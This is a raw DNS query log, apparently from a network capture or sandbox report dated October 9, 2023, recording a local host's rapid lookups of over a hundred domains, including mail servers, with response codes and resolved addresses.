                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.339602947 CEST1.1.1.1192.168.2.30x3145No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.643440008 CEST1.1.1.1192.168.2.30xc97fNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.970942020 CEST1.1.1.1192.168.2.30x3a1cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.970973969 CEST1.1.1.1192.168.2.30x3a1cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.971004963 CEST1.1.1.1192.168.2.30x3a1cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.999747038 CEST1.1.1.1192.168.2.30xacb2Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:09.160739899 CEST1.1.1.1192.168.2.30x9835No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:09.283904076 CEST1.1.1.1192.168.2.30xec29No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:09.948879957 CEST1.1.1.1192.168.2.30x57e5Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.212177992 CEST1.1.1.1192.168.2.30x4c46Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.324336052 CEST1.1.1.1192.168.2.30xb39aNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.324336052 CEST1.1.1.1192.168.2.30xb39aNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.324336052 CEST1.1.1.1192.168.2.30xb39aNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.324336052 CEST1.1.1.1192.168.2.30xb39aNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.409482956 CEST1.1.1.1192.168.2.30xee0eNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.607350111 CEST1.1.1.1192.168.2.30xf5fNo error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.683888912 CEST1.1.1.1192.168.2.30x2bcbNo error (0)anduran.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.683888912 CEST1.1.1.1192.168.2.30x2bcbNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.683888912 CEST1.1.1.1192.168.2.30x2bcbNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.683888912 CEST1.1.1.1192.168.2.30x2bcbNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.810292006 CEST1.1.1.1192.168.2.30x4d96No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.810292006 CEST1.1.1.1192.168.2.30x4d96No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.254348040 CEST1.1.1.1192.168.2.30x6624No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.619543076 CEST1.1.1.1192.168.2.30x5c44Server failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.665555954 CEST1.1.1.1192.168.2.30xba10No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.492700100 CEST1.1.1.1192.168.2.30x153fNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.759855032 CEST1.1.1.1192.168.2.30x6878No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.143543959 CEST1.1.1.1192.168.2.30x6de8Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.250854969 CEST1.1.1.1192.168.2.30x5083Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.742037058 CEST1.1.1.1192.168.2.30xbd05Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.037625074 CEST1.1.1.1192.168.2.30x5a39No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.234915972 CEST1.1.1.1192.168.2.30x2c43Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.499528885 CEST1.1.1.1192.168.2.30xf904No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.723802090 CEST1.1.1.1192.168.2.30x9b23No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.723802090 CEST1.1.1.1192.168.2.30x9b23No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.723802090 CEST1.1.1.1192.168.2.30x9b23No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.723802090 CEST1.1.1.1192.168.2.30x9b23No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.724307060 CEST1.1.1.1192.168.2.30xec10No error (0)alt4.gmail-smtp-in.l.google.com172.253.126.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.898852110 CEST1.1.1.1192.168.2.30x4151No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.898852110 CEST1.1.1.1192.168.2.30x4151No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.036669016 CEST1.1.1.1192.168.2.30x4f75Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.510682106 CEST1.1.1.1192.168.2.30xef77No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.936400890 CEST1.1.1.1192.168.2.30x9bf0No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.184870005 CEST1.1.1.1192.168.2.30xf0e9No error (0)hamaker.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.184870005 CEST1.1.1.1192.168.2.30xf0e9No error (0)hamaker.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.194977045 CEST1.1.1.1192.168.2.30x84fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.194988966 CEST1.1.1.1192.168.2.30x84fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.195079088 CEST1.1.1.1192.168.2.30x84fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.195139885 CEST1.1.1.1192.168.2.30x84fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.593763113 CEST1.1.1.1192.168.2.30x76bName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.863598108 CEST1.1.1.1192.168.2.30x7efcNo error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.868973017 CEST1.1.1.1192.168.2.30xf44aNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.882499933 CEST1.1.1.1192.168.2.30xcf81Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.038533926 CEST1.1.1.1192.168.2.30x4ac1Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.809636116 CEST1.1.1.1192.168.2.30xfbaeNo error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.809636116 CEST1.1.1.1192.168.2.30xfbaeNo error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.914781094 CEST1.1.1.1192.168.2.30x6fe5No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:19.262562990 CEST1.1.1.1192.168.2.30x6cc2No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:19.870001078 CEST1.1.1.1192.168.2.30xaab2No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:19.870001078 CEST1.1.1.1192.168.2.30xaab2No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.377688885 CEST1.1.1.1192.168.2.30x47c4Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.438838959 CEST1.1.1.1192.168.2.30x7061No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.438838959 CEST1.1.1.1192.168.2.30x7061No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.481565952 CEST1.1.1.1192.168.2.30x65ffName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.495102882 CEST1.1.1.1192.168.2.30x9b27No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.552555084 CEST1.1.1.1192.168.2.30x3967Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.606854916 CEST1.1.1.1192.168.2.30x9e46No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.616569042 CEST1.1.1.1192.168.2.30x54e3No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.627172947 CEST1.1.1.1192.168.2.30x1c4cNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.656374931 CEST1.1.1.1192.168.2.30x7d80No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.694030046 CEST1.1.1.1192.168.2.30xee77No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.731236935 CEST1.1.1.1192.168.2.30x9c87No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.822519064 CEST1.1.1.1192.168.2.30x3404No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.881253004 CEST1.1.1.1192.168.2.30x4c5No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.894458055 CEST1.1.1.1192.168.2.30xfebdNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.979655027 CEST1.1.1.1192.168.2.30x937dNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.086532116 CEST1.1.1.1192.168.2.30xe13cName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.142847061 CEST1.1.1.1192.168.2.30xcfccNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.190673113 CEST1.1.1.1192.168.2.30x6381No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.190673113 CEST1.1.1.1192.168.2.30x6381No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.190673113 CEST1.1.1.1192.168.2.30x6381No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.254610062 CEST1.1.1.1192.168.2.30x6c0cNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.312501907 CEST1.1.1.1192.168.2.30x58cfNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.391341925 CEST1.1.1.1192.168.2.30x7d41Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.636399984 CEST1.1.1.1192.168.2.30xcafcNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.217101097 CEST1.1.1.1192.168.2.30x1239Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.588781118 CEST1.1.1.1192.168.2.30x68adNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.588781118 CEST1.1.1.1192.168.2.30x68adNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.592966080 CEST1.1.1.1192.168.2.30x6d08No error (0)cubodown.com172.67.212.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.592966080 CEST1.1.1.1192.168.2.30x6d08No error (0)cubodown.com104.21.91.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.614007950 CEST1.1.1.1192.168.2.30x7b92Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.980422974 CEST1.1.1.1192.168.2.30xe09cNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.078665972 CEST1.1.1.1192.168.2.30x2a63No error (0)oh28ya.com54.178.105.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.078665972 CEST1.1.1.1192.168.2.30x2a63No error (0)oh28ya.com35.75.241.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.673002958 CEST1.1.1.1192.168.2.30x73fdNo error (0)dspears.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.673002958 CEST1.1.1.1192.168.2.30x73fdNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.673002958 CEST1.1.1.1192.168.2.30x73fdNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.673002958 CEST1.1.1.1192.168.2.30x73fdNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.023039103 CEST1.1.1.1192.168.2.30x1c85No error (0)kewlmail.com34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.037566900 CEST1.1.1.1192.168.2.30x8febNo error (0)webways.com104.21.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.037566900 CEST1.1.1.1192.168.2.30x8febNo error (0)webways.com172.67.128.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.064778090 CEST1.1.1.1192.168.2.30xd5eaNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.073415995 CEST1.1.1.1192.168.2.30x9d31Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.073477983 CEST1.1.1.1192.168.2.30x9d31Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.799072981 CEST1.1.1.1192.168.2.30x1fd8Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.080939054 CEST1.1.1.1192.168.2.30x7396No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.961571932 CEST1.1.1.1192.168.2.30x6ab1Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.961594105 CEST1.1.1.1192.168.2.30x6ab1Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.961730003 CEST1.1.1.1192.168.2.30x6ab1Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.132194042 CEST1.1.1.1192.168.2.30x6ab1Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.259852886 CEST1.1.1.1192.168.2.30xd3b0No error (0)araax.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.259852886 CEST1.1.1.1192.168.2.30xd3b0No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.259852886 CEST1.1.1.1192.168.2.30xd3b0No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.259852886 CEST1.1.1.1192.168.2.30xd3b0No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.363626003 CEST1.1.1.1192.168.2.30x9c34No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.030630112 CEST1.1.1.1192.168.2.30x91e3No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.030630112 CEST1.1.1.1192.168.2.30x91e3No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.223788023 CEST1.1.1.1192.168.2.30x83feNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.405047894 CEST1.1.1.1192.168.2.30x8f1aName error (3)dyag-eng.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.596710920 CEST1.1.1.1192.168.2.30x914fNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.824209929 CEST1.1.1.1192.168.2.30x4eb5No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.824209929 CEST1.1.1.1192.168.2.30x4eb5No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.864880085 CEST1.1.1.1192.168.2.30x7948Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.865077019 CEST1.1.1.1192.168.2.30x75bdServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.865087986 CEST1.1.1.1192.168.2.30x75bdServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.865128040 CEST1.1.1.1192.168.2.30x75bdServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.865252018 CEST1.1.1.1192.168.2.30x75bdServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.934079885 CEST1.1.1.1192.168.2.30xb0fcNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.019167900 CEST1.1.1.1192.168.2.30x312Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.142817020 CEST1.1.1.1192.168.2.30x946fNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.853111029 CEST1.1.1.1192.168.2.30x264dNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.853111029 CEST1.1.1.1192.168.2.30x264dNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.001935005 CEST1.1.1.1192.168.2.30x4feNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.001935005 CEST1.1.1.1192.168.2.30x4feNo error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.001935005 CEST1.1.1.1192.168.2.30x4feNo error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.001935005 CEST1.1.1.1192.168.2.30x4feNo error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.001935005 CEST1.1.1.1192.168.2.30x4feNo error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.564621925 CEST1.1.1.1192.168.2.30x35a2Name error (3)kayoaiba.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.006666899 CEST1.1.1.1192.168.2.30x90d8Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.387036085 CEST1.1.1.1192.168.2.30x68dbNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.522313118 CEST1.1.1.1192.168.2.30x131aName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:33.097865105 CEST1.1.1.1192.168.2.30xf5e3Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:33.983263016 CEST1.1.1.1192.168.2.30xc054No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.654516935 CEST1.1.1.1192.168.2.30x868eName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.732480049 CEST1.1.1.1192.168.2.30x6fe2No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.732480049 CEST1.1.1.1192.168.2.30x6fe2No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.732480049 CEST1.1.1.1192.168.2.30x6fe2No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.778331995 CEST1.1.1.1192.168.2.30xee20No error (0)rkengg.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.778331995 CEST1.1.1.1192.168.2.30xee20No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.778331995 CEST1.1.1.1192.168.2.30xee20No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.778331995 CEST1.1.1.1192.168.2.30xee20No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.788983107 CEST1.1.1.1192.168.2.30x51b8No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:35.019473076 CEST1.1.1.1192.168.2.30x2fa7No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:35.135427952 CEST1.1.1.1192.168.2.30x3c5fNo error (0)mondopp.net34.67.9.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:35.135443926 CEST1.1.1.1192.168.2.30x3c5fNo error (0)mondopp.net34.67.9.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:35.385381937 CEST1.1.1.1192.168.2.30x9bb2No error (0)htsmx.net34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:36.911887884 CEST1.1.1.1192.168.2.30xdd36No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:36.911947012 CEST1.1.1.1192.168.2.30xdd36No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
